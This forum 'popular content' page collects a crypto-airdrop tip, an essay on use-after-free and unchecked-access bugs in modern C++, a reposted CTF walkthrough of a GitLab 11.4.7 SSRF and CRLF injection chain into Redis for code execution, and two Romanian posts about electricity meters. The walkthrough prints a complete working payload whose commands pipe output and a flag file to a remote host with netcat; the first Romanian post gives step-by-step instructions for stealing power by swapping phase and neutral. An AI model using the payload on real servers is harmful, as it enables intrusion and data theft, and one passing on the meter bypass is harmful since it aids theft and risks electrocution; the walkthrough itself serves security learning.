
Leaderboard

Popular Content

Showing content with the highest reputation on 04/25/19 in all areas

  1. If you have a blockchain account and verify it (with an ID), you will receive / have already received some Stellar (XLM). If not, you can create an account here https://www.blockchain.com/getcrypto and, after ID verification, it credits your account with some random amount. Most people say they received the equivalent of 20-30 EUR. I received the equivalent of 45 EUR. The XLM can then be converted into ETH or BTC (or others) on sites like Binance or other equivalents. Enjoy!
    3 points
  2. 1 point
  3. Modern C++ Won't Save Us
2019-04-21 by alex_gaynor

I'm a frequent critic of memory unsafe languages, principally C and C++, and how they induce an exceptional number of security vulnerabilities. My conclusion, based on reviewing evidence from numerous large software projects using C and C++, is that we need to be migrating our industry to memory safe by default languages (such as Rust and Swift). One of the responses I frequently receive is that the problem isn't C and C++ themselves, developers are simply holding them wrong. In particular, I often receive defenses of C++ of the form, "C++ is safe if you don't use any of the functionality inherited from C"[1] or similarly that if you use modern C++ types and idioms you will be immune from the memory corruption vulnerabilities that plague other projects.

I would like to credit C++'s smart pointer types, because they do significantly help. Unfortunately, my experience working on large C++ projects which use modern idioms is that these are not nearly sufficient to stop the flood of vulnerabilities. My goal for the remainder of this post is to highlight a number of completely modern C++ idioms which produce vulnerabilities.

Hide the reference use-after-free

The first example I'd like to describe, originally from Kostya Serebryany, is how C++'s std::string_view can make it easy to hide use-after-free vulnerabilities:

#include <iostream>
#include <string>
#include <string_view>

int main() {
  std::string s = "Hellooooooooooooooo ";
  std::string_view sv = s + "World\n";
  std::cout << sv;
}

What's happening here is that s + "World\n" allocates a new std::string, and then is converted to a std::string_view. At this point the temporary std::string is freed, but sv still points at the memory that used to be owned by it. Any future use of sv is a use-after-free vulnerability. Oops! C++ lacks the facilities for the compiler to be aware that sv captures a reference to something where the reference lives longer than the referent. The same issue impacts std::span, also an extremely modern C++ type.

Another fun variant involves using C++'s lambda support to hide a reference:

#include <memory>
#include <iostream>
#include <functional>

std::function<int(void)> f(std::shared_ptr<int> x) {
  return [&]() { return *x; };
}

int main() {
  std::function<int(void)> y(nullptr);
  {
    std::shared_ptr<int> x(std::make_shared<int>(4));
    y = f(x);
  }
  std::cout << y() << std::endl;
}

Here the [&] in f causes the lambda to capture values by reference. Then in main, x goes out of scope, destroying the last reference to the data and causing it to be freed. At this point y contains a dangling pointer. This occurs despite our meticulous use of smart pointers throughout. And yes, people really do write code that handles std::shared_ptr<T>&, often as an attempt to avoid additional increments and decrements on the reference count.

std::optional<T> dereference

std::optional represents a value that may or may not be present, often replacing magic sentinel values (such as -1 or nullptr). It offers methods such as value(), which extract the T it contains and raise an exception if the optional is empty. However, it also defines operator* and operator->. These methods also provide access to the underlying T, however they do not check if the optional actually contains a value or not.
The following code, for example, simply returns an uninitialized value:

#include <optional>

int f() {
  std::optional<int> x(std::nullopt);
  return *x;
}

If you use std::optional as a replacement for nullptr this can produce even more serious issues! Dereferencing a nullptr gives a segfault (which is not a security issue, except in older kernels). Dereferencing a nullopt, however, gives you an uninitialized value as a pointer, which can be a serious security issue. While having a T* with an uninitialized value is also possible, these are much less common than dereferencing a pointer that was correctly initialized to nullptr. And no, this doesn't require you to be using raw pointers. You can get uninitialized/wild pointers with smart pointers as well:

#include <optional>
#include <memory>

std::unique_ptr<int> f() {
  std::optional<std::unique_ptr<int>> x(std::nullopt);
  return std::move(*x);
}

std::span<T> indexing

std::span<T> provides an ergonomic way to pass around a reference to a contiguous slice of memory and a length. This lets you easily write code that works over multiple different types; a std::span<uint8_t> can point to memory owned by a std::vector<uint8_t>, a std::array<uint8_t, N>, or even a raw pointer. Failure to correctly check bounds is a frequent source of security vulnerabilities, and in many senses span helps out with this by ensuring you always have a length handy.

Like all STL data structures, span's operator[] method does not perform any bounds checks. This is regrettable, since operator[] is the most ergonomic and default way people use data structures. std::vector and std::array can at least theoretically be used safely because they offer an at() method which is bounds checked (in practice I've never seen this done, but you could imagine a project adopting a static analysis tool which simply banned calls to std::vector<T>::operator[]). span does not offer an at() method, or any other method which performs a bounds checked lookup. Interestingly, both Firefox and Chromium's backports of std::span do perform bounds checks in operator[], and thus they'll never be able to safely migrate to std::span.

Conclusion

Modern C++ idioms introduce many changes which have the potential to improve security: smart pointers better express expected lifetimes, std::span ensures you always have a correct length handy, std::variant provides a safer abstraction for unions. However, modern C++ also introduces some incredible new sources of vulnerabilities: lambda capture use-after-free, uninitialized-value optionals, and un-bounds-checked span.

My professional experience writing relatively modern C++, and auditing Rust code (including Rust code that makes significant use of unsafe), is that the safety of modern C++ is simply no match for memory safe by default languages like Rust and Swift (or Python and JavaScript, though I find it rare in life to have a program that makes sense to write in either Python or C++). There are significant challenges to migrating existing, large, C and C++ codebases to a different language -- no one can deny this. Nonetheless, the question simply must be how we can accomplish it, rather than if we should try. Even with the most modern C++ idioms available, the evidence is clear that, at scale, it's simply not possible to hold C++ right.

[1] I understood this to be referring to raw pointers, arrays-as-pointers, manual malloc/free, and other similar features.
However, I think it's worth acknowledging that, given that C++ explicitly incorporated C into its specification, in practice most C++ code incorporates some of these elements.

Hi, I'm Alex. I'm currently at a startup called Alloy. Before that I was an engineer working on Firefox security, and before that at the U.S. Digital Service. I'm an avid open source contributor and live in Washington, DC.

Source: https://alexgaynor.net/2019/apr/21/modern-c++-wont-save-us/
    1 point
  4. GitLab 11.4.7 Remote Code Execution
21 Apr 2019 · Capture The Flag, Web Hacking, Exploit Walkthrough

TL;DR: SSRF targeting Redis for RCE via IPv6/IPv4 address embedding, chained with CRLF injection in the git:// protocol.

Introduction

At the Real World CTF, we came across an interesting web challenge called flaglab. The description said "You might need a 0day", there was a link to the challenge, and there was a download link for a docker-compose.yml file. Upon visiting the challenge site, we are greeted by a GitLab instance. The docker-compose.yml file can be used to set up a local version of this very instance. Inside the docker-compose.yml, the docker image is set to gitlab/gitlab-ce:11.4.7-ce.0. Upon doing a Google search on the GitLab version, we stumbled upon a blog post on GitLab Patch Release, and it seemed like it was the latest version - the blog post was created on Nov 21, 2018 and the CTF was happening on Dec 1, 2018. So we thought we would never find a 0day in GitLab due to its huge codebase, and that it would just be a waste of time... But as it turns out, we were wrong on these assumptions.

During a post-CTF dinner with other teams, some people from RPISEC told us that it was not the latest version - there was a newer version 11.4.8, and the commit history of the newer version reveals several security patches. One of the bugs was an "SSRF in Webhooks" and it was reported by nyangawa of Chaitin Tech (which is also the company that organized the Real World CTF). Knowing all this, it was actually a fairly simple challenge, and I was mad because we gave up without doing enough research. So after the event, I tried to solve this challenge with the knowledge gained so far.

Setup

Let's start setting up a local copy of the vulnerable version of GitLab. We can start by looking at the docker-compose.yml file.

web:
  image: 'gitlab/gitlab-ce:11.4.7-ce.0'
  restart: always
  hostname: 'gitlab.example.com'
  environment:
    GITLAB_OMNIBUS_CONFIG: |
      external_url 'http://gitlab.example.com'
      redis['bind']='127.0.0.1'
      redis['port']=6379
      gitlab_rails['initial_root_password']=File.read('/steg0_initial_root_password')
  ports:
    - '5080:80'
    - '50443:443'
    - '5022:22'
  volumes:
    - './srv/gitlab/config:/etc/gitlab'
    - './srv/gitlab/logs:/var/log/gitlab'
    - './srv/gitlab/data:/var/opt/gitlab'
    - './steg0_initial_root_password:/steg0_initial_root_password'
    - './flag:/flag:ro'

From the above YAML file, the following conclusions can be made:
- The docker image used is GitLab Community Edition 11.4.7 (gitlab-ce:11.4.7-ce.0).
- The Redis server runs on port 6379 and is listening on localhost.
- The Rails initial_root_password is set using a file called steg0_initial_root_password.
- There are some ports mapped from the docker container to our machine, which exposes the application outside the container for us to fiddle with. We'll be using the HTTP service running on port 5080.
- Additionally, there are volumes, which mount local files and folders inside the docker container. For example, ./srv/gitlab/logs on our machine will be mounted to /var/log/gitlab inside the docker container. The password file and the flag are also copied into the container.

You can create these required files and folders using the following commands:

# Create required folders for the gitlab logs, data and configs; leave them empty
mkdir -p ./srv/gitlab/config ./srv/gitlab/data ./srv/gitlab/logs

# Create a random password using python
python3 -c "import secrets; print(secrets.token_urlsafe(16))" > ./steg0_initial_root_password
# ==OR==
# Choose your own password
echo "my_sup3r_s3cr3t_p455w0rd_4ef5a2e1" > ./steg0_initial_root_password

# Create a test flag
echo "RWCTF{this_is_flaglab_flag}" > ./flag

Now that we have the required files and folders, we can start the docker container using the following command.

$ docker-compose up

The process of downloading the base image and building the GitLab instance might take a few minutes. After you start seeing some logs, you should be able to browse to http://127.0.0.1:5080/ for the vulnerable GitLab version. Now it's time to configure the Chrome browser to use a proxy. You can do it manually by going to the settings and changing it there, or you can do it via the command line, which is a bit handier.

/path/to/chrome --proxy-server="127.0.0.1:8080" --profile-directory=Proxy --proxy-bypass-list=""

I had problems with the Burp Suite proxy not being able to intercept the localhost requests even with the bypass list being empty. So a quick workaround was to add an entry in the hosts file like the following.

127.0.0.1 localhost.com

Browsing to http://localhost.com:5080 now lets us access GitLab through the Burp Suite proxy. That's all for the setup!

The Bugs

As you already know, we thought that 11.4.7 was the latest version of GitLab at that time, but in fact there was a newer version 11.4.8 which had many security patches in the commits. One of the bugs was related to SSRF, and it even referenced Chaitin Tech, which is the company responsible for hosting the Real World CTF. Additionally, we also know that the flag file is located in / (the root of the file system), so we need an Arbitrary File Read or a Remote Code Execution vulnerability. Now let's have a look at those patches for SSRF and other potential bugs. At the top, you'll find 3 security related commits. There's our SSRF in Webhooks, we also have an XSS, but it's not that interesting for us, and finally we have a CRLF injection (Carriage-Return/Line-Feed), which is basically a newline injection.

If we look at the fix for the SSRF issue and scroll down a bit, you'll see that there are unit tests to confirm the fix for the issue. These tests tell us how to exploit the bug, which is exactly what we wanted. Looking at some test cases, apparently special IPv6 addresses which have an IPv4 address embedded inside them can bypass the SSRF checks (a short Python sketch below illustrates why this form slips past a naive localhost check).

# SSRF protection bypass
https://[0:0:0:0:0:ffff:127.0.0.1]

The other issue was a CRLF vulnerability in Project hooks; scrolling down to the test cases, you can see it's merely URLs with newlines - either URL encoded, or simply regular newlines.

Now the question is, can these bugs help us in exploiting GitLab to get the flag? Yes, they can. By chaining these 2 bugs, we can get a Remote Code Execution. It's actually a typical security issue. Basically, an SSRF or Server Side Request Forgery is used to target the local internal Redis database, which is used extensively for different types of workers. So if you can push a malicious worker, you might end up with a Remote Code Execution vulnerability. In fact, GitLab has been exploited like this several times before, and there are many bug bounty writeups which are similar to this.
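Why does the embedded-IPv4 form above get past a localhost filter? Here is a small illustrative Python sketch (a hypothetical blocklist-style check, not GitLab's actual validation code): a filter that only matches the usual loopback spellings never triggers, yet the IPv4-mapped IPv6 address still points at the IPv4 loopback once it is unwrapped.

import ipaddress

def naive_is_blocked(host: str) -> bool:
    # hypothetical blocklist-style check, NOT GitLab's real code
    return host in ("localhost", "127.0.0.1", "::1")

host = "0:0:0:0:0:ffff:127.0.0.1"
print(naive_is_blocked(host))          # False -> the import URL would be allowed

addr = ipaddress.ip_address(host)      # parses as an IPv6 address
print(addr.ipv4_mapped)                # 127.0.0.1
print(addr.ipv4_mapped.is_loopback)    # True -> the request actually hits localhost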
I don't remember where I first came across this technique, but I believe @Agarri_FR tweeted about it back in 2015, and there was also a blog post by him from 2014. I have since come across it in many bug bounty writeups, so everyone who's into web security should know about it.

Exploitation

Now onto the fun stuff. First, let's see if we can trigger an SSRF somewhere. At first, I thought about targeting the Webhooks (used to send requests to a URL whenever any events are fired in the repository) like it's mentioned here. However, when I clicked on create a new project, I saw multiple ways to import a project, and one of them was "Repo by URL", which would basically fetch the repo when you specify a URL. We can import a repo over http://, https:// and git://. So to test this, we can try to import the repo using the following URL.

http://127.0.0.1/test/somerepo.git

But we'd get the error that "Import URL is blocked: Requests to localhost are not allowed". Now, we can try the bypass using the special IPv6 address, so we replace the import URL with the following.

http://[0:0:0:0:0:ffff:127.0.0.1]:1234/test/ssrf.git

Before importing using this URL, we need a server listening on port 1234 to confirm the SSRF. To do that, we can get a root shell on the docker container to install netcat and then listen on port 1234 to see if the SSRF is triggered. First, let's go ahead and list all the running Docker containers to know which one to get a shell on.

# get a list of running docker containers
$ docker ps
CONTAINER ID   IMAGE                          COMMAND   CREATED   STATUS   NAMES
bd9daf8c07a6   gitlab/gitlab-ce:11.4.7-ce.0   ...       ...       ...      ...

We just have one running, and it's the GitLab 11.4.7. We can get a shell on the container using the following command by specifying a container ID.

$ docker exec -i -t bd9daf8c07a6 "/bin/bash"

Here, bd9daf8c07a6 is the container ID, -i means interaction with /bin/bash, and -t means create a tty - a pseudo terminal for the interaction. Now that we have the shell, we can install netcat so that we can set up a simple server to listen for incoming SSRF requests.

root@gitlab:~ apt update && apt install -y netcat

Setting up a raw TCP server is as simple as the following command.

root@gitlab:~ nc -lvp 1234

Here, -l tells netcat to listen, -v is for verbose output, and -p specifies the port number the server has to bind to. Now that we have our SSRF testing setup done, let's make the same import request to see if we can trigger the SSRF. Additionally, instead of specifying the URL from the web application in the browser, we can use Burp Suite's Repeater to quickly modify the HTTP request to our needs and send it away. To do this, we can modify the old "Repo by URL" request: we update the URL to http://[0:0:0:0:0:ffff:127.0.0.1]:1234/test/ssrf.git and the name of the project to something that isn't already there, and send the request.

As you can see from the above image, we did get the request trapped in our netcat listener. This confirms that there is an SSRF which can talk to internal services - in our case the local netcat server on port 1234 - which means that we can also talk to the internal Redis server running on port 6379 (specified in the docker-compose.yml).

But what is Redis and how does GitLab use it? Redis is an in-memory data structure store, used as a database, cache and message broker. GitLab uses it in different ways, like storing session data, caching, and even background job queues.
Redis uses a straightforward, plain text protocol, which means you can directly connect to Redis using netcat and start messing around.

# quick test with redis
root@gitlab:~ nc 127.0.0.1 6379
blah
- ERR unknown command 'blah'
set liveoverflow test
+OK
asd
- ERR unknown command 'asd'
get liveoverflow
$4
test

Redis is a simple ASCII text-based protocol, but HTTP is also a simple ASCII text-based protocol. Now, what would happen if we tried to send an HTTP request to Redis? Would Redis execute commands? Let's try.

# http request test with redis
root@gitlab:~ nc 127.0.0.1 6379
GET /test/ssrf.git/info/refs?service=git-upload-pack HTTP/1.1
Host: [0:0:0:0:0:ffff:127.0.0.1]:1234
User-Agent: git/2.18.1
Accept: */*
Accept-Encoding: deflate, gzip
Pragma: no-cache
- Err wrong number of arguments for 'get' command
root@gitlab:~

It gives us an error saying that there is a wrong number of arguments for the 'get' command, which makes sense because from the earlier example we know how the 'get' command in Redis works. But then we are dropped back to the shell - yet from earlier we saw that Redis doesn't quit even when there are errors, so what is actually going on? Pasting the raw HTTP protocol data line by line gives us the answer. The second line, Host: [0:0:0:0:0:ffff:127.0.0.1]:1234, is responsible for Redis terminating the connection unexpectedly. This happens because SSRF to Redis is a huge issue, and Redis has implemented a "fix" for it: if the string "Host:" is sent to the Redis server as a command, it knows that this is an HTTP request trying to smuggle some Redis commands, and it stops execution by closing the connection. If only we could get our payload in between the first line (GET /test...) and the second (Host: ...), we could make this work. Since we control the first line of the HTTP request, can we inject some newlines and add more commands? *cough* CRLF *cough*

Yes, remember the CRLF injection bug we saw in the Security Release and the commit history - we can use that! From the commit history's test cases, we can see that the injection is pretty straightforward: merely adding newlines, or URL-encoding them, does the trick. For example:

http://127.0.0.1:333/%0D%0Atest%0D%0Ablah.git
# Expected to be converted to
http://127.0.0.1:333/
test
blah.git

However, this didn't work out. Not sure why it doesn't work over http://, but changing the protocol from http:// to git:// makes it work.

# Does work :)
git://127.0.0.1:333/%0D%0Atest%0D%0Ablah.git
# Expected to be converted to
git://127.0.0.1:333/
test
blah.git

Now that we know what Redis is, where it's being used, and how we can add newlines using the CRLF injection, we can move on to creating a payload for the RCE. The idea is to talk to this internal Redis server by using the SSRF vulnerability, smuggling one protocol (Redis) inside another (git://), and get Remote Code Execution. Fortunately, @jobertabma has already figured out the payload. Let's have a look at it.

multi
sadd resque:gitlab:queues system_hook_push
lpush resque:gitlab:queue:system_hook_push "{\"class\":\"GitlabShellWorker\",\"args\":[\"class_eval\",\"open(\'|whoami | nc 192.241.233.143 80\').read\"],\"retry\":3,\"queue\":\"system_hook_push\",\"jid\":\"ad52abc5641173e217eb2e52\",\"created_at\":1513714403.8122594,\"enqueued_at\":1513714403.8129568}"
exec

As you know, Redis can also be used for background job queues. These jobs are handled by Sidekiq, which is a background task processor for Ruby.
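Sidekiq pulls its jobs as JSON blobs from Redis lists, so anyone who can issue write commands to Redis can enqueue a job by hand. As a rough sketch of the mechanics (hypothetical queue and worker names, and assuming Python with the third-party redis package is available, e.g. inside the container), registering a queue and pushing a job is just a SADD plus an LPUSH - the same commands that appear in the payload above:

# sketch: how a Sidekiq job lands in Redis (illustrative, hypothetical names)
import json
import redis  # third-party package: pip install redis

r = redis.Redis(host="127.0.0.1", port=6379)

# the JSON shape Sidekiq expects for a job
job = {
    "class": "SomeWorker",           # worker class that will be instantiated
    "args": ["some", "arguments"],   # arguments passed to its perform() method
    "retry": 3,
    "queue": "some_queue",
    "jid": "0123456789abcdef",       # job id
}

r.sadd("resque:gitlab:queues", "some_queue")                # register the queue
r.lpush("resque:gitlab:queue:some_queue", json.dumps(job))  # enqueue the job

The smuggled payload does exactly this, only wrapped in MULTI/EXEC and delivered through the git:// import URL instead of a direct connection.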
We can look at the list of Sidekiq queues to see if there's anything that we can use.

...
- [default, 1]
- [pages, 1]
- [system_hook_push, 1]
- [propagate_service_template, 1]
- [background_migration, 1]
...

There's system_hook_push, which can be used to handle new jobs, and it's the same one being used in the actual payload. Now, to execute code/commands, we need a class that would do it for us - think of this as a gadget. Fortunately, Jobert has also found the right class - gitlab_shell_worker.rb.

class GitlabShellWorker
  include ApplicationWorker
  include Gitlab::ShellAdapter

  def perform(action, *arg)
    gitlab_shell.__send__(action, *arg) # rubocop:disable GitlabSecurity/PublicSend
  end
end

As you can see, this is exactly the class we've been looking for. This GitlabShellWorker is called with some arguments like class_eval and the actual command which needs to be executed, which in our case is the following.

open('| COMMAND_TO_BE_EXECUTED').read

In the actual payload, we push the job onto the system_hook_push queue and get the GitlabShellWorker class to run our commands. Now that we have everything we need for the exploitation, we can craft the final payload and send it over. Before doing that, I need to set up a netcat listener on our main machine (192.168.178.21) to receive the flag.

$ nc -lvp 1234

The final payload looks like the following.

multi
sadd resque:gitlab:queues system_hook_push
lpush resque:gitlab:queue:system_hook_push "{\"class\":\"GitlabShellWorker\",\"args\":[\"class_eval\",\"open(\'| cat /flag | nc 192.168.178.21 1234\').read\"],\"retry\":3,\"queue\":\"system_hook_push\",\"jid\":\"ad52abc5641173e217eb2e52\",\"created_at\":1513714403.8122594,\"enqueued_at\":1513714403.8129568}"
exec
exec

Some points to note:
- In the payload above, the Redis commands need a whitespace before them on every line - no clue why.
- cat /flag | nc 192.168.178.21 1234 - we are reading the flag and sending it over to our netcat listener.
- An extra exec command is added so that the first one is executed properly and it is the second one that gets concatenated with the next line; this way the important part of the payload won't break.

The final import URL with the payload looks like this:

# No encoding
git://[0:0:0:0:0:ffff:127.0.0.1]:6379/
 multi
 sadd resque:gitlab:queues system_hook_push
 lpush resque:gitlab:queue:system_hook_push "{\"class\":\"GitlabShellWorker\",\"args\":[\"class_eval\",\"open(\'|cat /flag | nc 192.168.178.21 1234\').read\"],\"retry\":3,\"queue\":\"system_hook_push\",\"jid\":\"ad52abc5641173e217eb2e52\",\"created_at\":1513714403.8122594,\"enqueued_at\":1513714403.8129568}"
 exec
 exec
/ssrf.git

# URL encoded
git://[0:0:0:0:0:ffff:127.0.0.1]:6379/%0D%0A%20multi%0D%0A%20sadd%20resque%3Agitlab%3Aqueues%20system%5Fhook%5Fpush%0D%0A%20lpush%20resque%3Agitlab%3Aqueue%3Asystem%5Fhook%5Fpush%20%22%7B%5C%22class%5C%22%3A%5C%22GitlabShellWorker%5C%22%2C%5C%22args%5C%22%3A%5B%5C%22class%5Feval%5C%22%2C%5C%22open%28%5C%27%7Ccat%20%2Fflag%20%7C%20nc%20192%2E168%2E178%2E21%201234%5C%27%29%2Eread%5C%22%5D%2C%5C%22retry%5C%22%3A3%2C%5C%22queue%5C%22%3A%5C%22system%5Fhook%5Fpush%5C%22%2C%5C%22jid%5C%22%3A%5C%22ad52abc5641173e217eb2e52%5C%22%2C%5C%22created%5Fat%5C%22%3A1513714403%2E8122594%2C%5C%22enqueued%5Fat%5C%22%3A1513714403%2E8129568%7D%22%0D%0A%20exec%0D%0A%20exec%0D%0A/ssrf.git
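If you'd rather not percent-encode that by hand, the encoded import URL can be generated with a few lines of Python. This is only a sketch: JOB_JSON stands for the full GitlabShellWorker job string from the payload above, and the exact percent-encoding may differ slightly from the one shown (e.g. underscores) while decoding to the same payload.

# sketch: building the URL-encoded git:// import URL
from urllib.parse import quote

JOB_JSON = '"{\\"class\\":\\"GitlabShellWorker\\",...}"'  # paste the full job string from above here

lines = [
    " multi",
    " sadd resque:gitlab:queues system_hook_push",
    " lpush resque:gitlab:queue:system_hook_push " + JOB_JSON,
    " exec",
    " exec",
]

# a leading CRLF pushes the smuggled commands onto their own lines inside the git:// request
payload = "\r\n" + "\r\n".join(lines) + "\r\n"
url = "git://[0:0:0:0:0:ffff:127.0.0.1]:6379/" + quote(payload, safe="") + "/ssrf.git"
print(url)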
Now if you send the "Repo by URL" request with this URL, we get the flag!

Conclusion and Takeaways

This was a simple challenge, and after hearing about a newer version from the RPISEC team, and after seeing that one of the reported bugs was by Chaitin Tech (the organizers), it was just a matter of 2-3 hours to solve it. Do proper research before jumping to conclusions. It's all about the mindset.

Resources
- docker-compose.yml
- Video Explanation

LiveOverflow (and PwnFunction) wannabe hacker...

Source: https://liveoverflow.com/gitlab-11-4-7-remote-code-execution-real-world-ctf-2018/
    1 point
  5. Ma ajuta si pe mine careva ? Stau la casa,am contor clasic e pe stalp asta-i toata faza. Oare chestia asta ar merge? Am dat copy paste de undeva. este o metoda foarte simpla si nici nare cun sa te prinda , intodeauna idiferent de contor fie electronic fie clasic( de ala cu rotita)sau cu cartela intodeauna intran faza daca sunteti atenti bornele de la nul sunt in partea stanga a contorului (asta pentru electricienii care cunosc pentru restu imi pare rau) ele sunt comune ei acum daca stati la casa inversati faza cu nulu de pe stalp sau daca sati la bloc inversati faza si nulu din cutia verde sau din cutia unde sunt contoarele inversati faza si nulu din cablu de alimentare , in cazul asta va intra nulu prin contor si faza nu , ei acum va faceti un nul separa adica va legati de teava de apa sau bagati oteava zincata in pamant si legati un fir de ea (de preferinta teava sa aiba 5 sau mai multi metri) cu acest fir si o faza dintro priza sau o doza puteti fura curent linistiti , acum spor la treaba
    1 point
  6. La orice fel de contor electric monofazat sunt patru borne, dupa cum urmeaza: - Borna 1: Faza intrare - Borna 2: Faza iesire - Borna 3: Null intrare - Borna 4: Null iesire Note: - De regula, 3 si 4 este una si aceiasi borna (fac corp comun in interior). - La contoarele clasice (inductie) intre borna 1 si borna 2 vine o bobina de cateva spire ce face un camp magnetic si in functie de intensitatea acestuia (de consum), se mareste sau se micsoreaza rotatia acelui ax cu volanta. - Tot la contoarele vechi, se putea bobina un transformator cu appx. 2 V, cu ajutorul caruia puteai aplica tensiune bobinei contorului, astfel incat acesta se invartea invers. La un alt model de contor, au facut pinioane duble cu cricket ca la orice sens de rotatie, indexul numeric sa mearga inainte. Hint: Majoritatea contoarelor noi au port infrarosu. Daca va place hacking-ul, cumparati un contor de acelasi model (se cumpara de la magazine specializate), il puneti pe masa si va jucati cu el. Mai departe va descurcati voi (sau nu). Daca aveti alte intrebari legate de instalatii electrice si/sau automatizari, putem face un thread dedicat pentru asta. PS: fara furaciuni.
    1 point